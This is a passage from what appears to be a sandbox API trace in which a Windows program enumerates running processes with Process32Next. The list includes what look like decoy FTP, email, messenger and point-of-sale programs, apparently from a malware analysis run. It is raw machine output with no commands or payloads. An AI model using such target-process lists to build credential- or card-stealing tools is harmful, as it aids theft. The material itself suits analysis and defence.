lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0155.981] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0155.983] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0155.985] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0155.987] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0155.989] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0155.992] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0155.994] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0155.996] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0155.998] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0156.000] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0156.003] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0156.005] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0156.007] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0156.044] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0156.047] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0156.049] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0156.051] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0156.053] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0156.055] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0156.058] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0156.060] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0156.062] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0156.064] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0156.066] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0156.069] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0156.071] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0156.073] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0156.079] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0156.084] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0156.086] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0156.088] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0156.091] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0156.093] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0156.095] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0156.097] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0156.099] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0156.102] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0156.104] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0156.106] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0156.108] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0156.111] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0156.114] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0156.116] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0156.119] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0156.125] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0156.127] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0156.130] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0156.134] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0156.137] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0156.140] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0156.142] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0156.145] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0156.148] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0156.150] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0156.154] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0156.157] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0156.164] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0156.167] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0156.169] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0156.172] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0156.175] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0156.178] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0156.181] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0156.183] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0156.186] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0156.189] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0156.192] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0156.195] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0156.198] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0156.202] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0156.205] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0156.207] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0156.209] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0156.211] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0156.214] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0156.217] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0156.220] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0156.222] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0156.225] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0156.228] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0156.230] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0156.233] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0156.239] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0156.242] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: 